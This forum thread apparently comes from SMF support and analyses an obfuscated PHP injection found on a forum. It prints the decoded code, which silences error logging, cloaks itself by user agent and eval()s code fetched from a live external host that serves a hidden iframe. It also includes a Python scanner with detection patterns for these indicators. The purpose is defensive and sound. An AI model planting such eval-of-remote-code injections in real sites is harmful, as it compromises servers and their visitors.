
base64 hack


gamesmad:
This reply attempts to assess what this attack is actually doing, and as such contains links to bad sites that could (and probably do) contain malware.  Do not click the links unless you know what you are doing.  I am not responsible for any problems you may have.

The code can be unscrambled to this -


--- Code: ---<?php
/*68066*/
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors','Off');
error_reporting(0);
set_time_limit(0);
$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux", "X11");
if(
(preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_REFERER"]) ==0) or (isset($_SERVER["HTTP_COOKIE"])) or (isset($_SERVER["HTTP_USER_AGENT"]) ==0)) {
} else {
@setcookie($z37,md5("stats"),time()+172800);
$url = "http://4040ent.com/session.php?id";
$iframe=@eval(file_get_contents ($url));
if ($iframe) echo($iframe);
}
/*68066*/
?>
<?php
// Try to handle it with the upper level index.php. (it should know what to do.)
if (file_exists(dirname(dirname(__FILE__)) . '/index.php'))
include (dirname(dirname(__FILE__)) . '/index.php');
else
exit;
?>

--- End code ---

I'll now try and break it down, but this is only my best guess, so if anyone else knows better then please correct me.  Explanations are just above each code snippet.


This looks like a unique reference, so that the attacker can track which hacks have worked and which haven't.

--- Code: ---/*68066*/
--- End code ---


This section is turning off visual error reporting and also error logging, an attempt to avoid detection, I assume.

--- Code: ---error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors','Off');
error_reporting(0);
set_time_limit(0);
--- End code ---


Here there are a couple of variables being set up.  $_SERVER["HTTP_USER_AGENT"] is a PHP variable that (in simple terms) contains the name of the browser that is being used to view the page.

For example "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13" would be the value if you were using Google Chrome on Windows XP.

Importantly, Google and other search engines will set this value to make it clear it was them visiting, for example "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" is Googlebot.

This brings us on to the array, which seems to list search engines.

--- Code: ---$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux", "X11");
--- End code ---


This bit is quite complicated, but basically it is checking whether the page visitor is a search engine or not.  If the visitor is a search engine then it displays the contents of the page "http://4040ent.com/session.php?id", which is -


--- Code: ---<iframe src="http://directs39.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
--- End code ---

Which is a 1 x 1 iframe of the page http://directs39.in/in.cgi?55764.

It also sets a cookie called "stats".

--- Code: ---if(
(preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_REFERER"]) ==0) or (isset($_SERVER["HTTP_COOKIE"])) or (isset($_SERVER["HTTP_USER_AGENT"]) ==0)) {
} else {
@setcookie($z37,md5("stats"),time()+172800);
$url = "http://4040ent.com/session.php?id";
$iframe=@eval(file_get_contents ($url));
if ($iframe) echo($iframe);
}
--- End code ---


That seems to be where the trail runs out, because visiting the page "http://directs39.in/in.cgi?55764" redirects to Google; however, the attack is complicated, so it could redirect to another site if the iframe is viewed from a site that has been attacked.  As I said, this is where the trail runs out for me, but that is most likely due to my limited knowledge.

Visiting "http://directs39.in/" takes you to a page with 2 login options, one for a user, and one for bos (back office system?).  The page title is "traffic index".

This may not seem like it's actually doing anything; however, to me this looks like it is gaming search engines by having the ability to control the content that a search engine spider downloads (when visiting your website!), while the site appears unchanged to normal users.  It is a hack to get backlinks to a site.  There is certainly more to it than I have covered here, probably tracking to pick up the cookie and something to control what is displayed instead of the "real" content, but I am stuck in terms of digging any deeper.

Put simply, you need to remove it from your sites.

Krash.:

That's pretty much consistent with what we had. Forum was unaffected, nothing unusual in error log, no spam or redirects, users were just getting security alerts.

Is this an SMF vulnerability, or poor host security?

Arantor:
Probably more the case that the files were left writable by the server itself, i.e. not the host's fault but the forum admin's fault for not securing the files after mods were installed - that's the reason for almost all of the 'I got hacked' reports here.
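As an added example (not code from this thread, from gamesmad, or from SMF itself), here is a small Python scanner that looks for the indicators visible in the decoded sample gamesmad posted above, namely eval() of a fetched or decoded string, the numeric marker comments, the error-silencing calls and the crawler user-agent list, and that also flags group- or world-writable PHP files, as a rough check for the "left writable by the server" problem Arantor describes. The two sample files, the placeholder callback host attacker.example and the indicator names are all constructed for the example and are not taken from any real server.

```python
import os
import re
import stat
import tempfile

# Constructed samples, not taken from any real server: a cut-down copy of the
# decoded injection posted above, with the callback host replaced by the
# placeholder attacker.example, and the clean SMF index.php stub it sat on top of.
INJECTED_PHP = """<?php
/*68066*/
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors','Off');
set_time_limit(0);
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux", "X11");
if (preg_match("/" . implode("|", $u37) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
} else {
$url = "http://attacker.example/session.php?id";
$iframe=@eval(file_get_contents ($url));
if ($iframe) echo($iframe);
}
/*68066*/
?>
"""
CLEAN_PHP = """<?php
if (file_exists(dirname(dirname(__FILE__)) . '/index.php'))
include (dirname(dirname(__FILE__)) . '/index.php');
else
exit;
?>
"""

# Indicators taken from the decoded sample. A strong one executes fetched or
# decoded code and is enough on its own; weak ones also occur in legitimate
# code and only count when several appear together.
STRONG = {
    "eval-of-remote-fetch": re.compile(r"eval\s*\(\s*file_get_contents\s*\(", re.I),
    "eval-of-decoded-blob": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
}
WEAK = {
    "numeric-marker-comment": re.compile(r"/\*\d{4,6}\*/"),
    "error-reporting-off": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "display-errors-off": re.compile(
        r"ini_set\s*\(\s*['\"]display_errors['\"]\s*,\s*['\"]Off['\"]", re.I),
    "crawler-ua-list": re.compile(r'"Slurp"\s*,\s*"MSNBot"\s*,\s*"ia_archiver"'),
}

def scan_source(src):
    """Return (strong_hits, weak_hits) for the contents of one PHP file."""
    strong = [name for name, rx in STRONG.items() if rx.search(src)]
    weak = [name for name, rx in WEAK.items() if rx.search(src)]
    return strong, weak

def is_suspicious(strong, weak):
    return bool(strong) or len(weak) >= 3

def is_loosely_writable(path):
    """Group- or world-writable: a web server running as a different user than
    the file owner can then modify the file. This is an approximation of the
    exposure described above; ownership and ACLs are not examined here."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def scan_tree(root):
    """Walk root and return one finding per suspicious PHP file, sorted by path."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                strong, weak = scan_source(fh.read())
            if is_suspicious(strong, weak):
                findings.append({
                    "path": os.path.relpath(path, root).replace(os.sep, "/"),
                    "strong": strong,
                    "weak": weak,
                    "writable": is_loosely_writable(path),
                })
    return sorted(findings, key=lambda f: f["path"])

def demo():
    """Build a throwaway tree with one injected and one clean index.php."""
    root = tempfile.mkdtemp(prefix="smf-scan-")
    for sub, body, mode in (("Sources", INJECTED_PHP, 0o666),
                            ("Themes", CLEAN_PHP, 0o644)):
        os.makedirs(os.path.join(root, sub))
        path = os.path.join(root, sub, "index.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return scan_tree(root)

if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: strong={f['strong']} weak={f['weak']} "
              f"writable={f['writable']}")
```

Point scan_tree() at the forum root rather than at the demo directory to use it for real. Review every hit by hand: the weak indicators also show up in legitimate bot-detection code, and an absent hit is not a clean bill of health, since the sample in this thread was found only because it was decoded; a re-obfuscated copy with different function names would need its own signature.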

Krash.:

That's the other problem.  When I look at this account in Filezilla, the permissions column is blank for all subdirs and files, right up to the root.   Checking individual file permissions, I see 'xxx'.  If I reset to 644 or 755, it doesn't change.  Same thing if I upload a new file.  Only happens on this account, my other GoDaddy forums display permissions normally.

Arantor:
Sounds to me as though permission changes are blocked on that server via FTP.
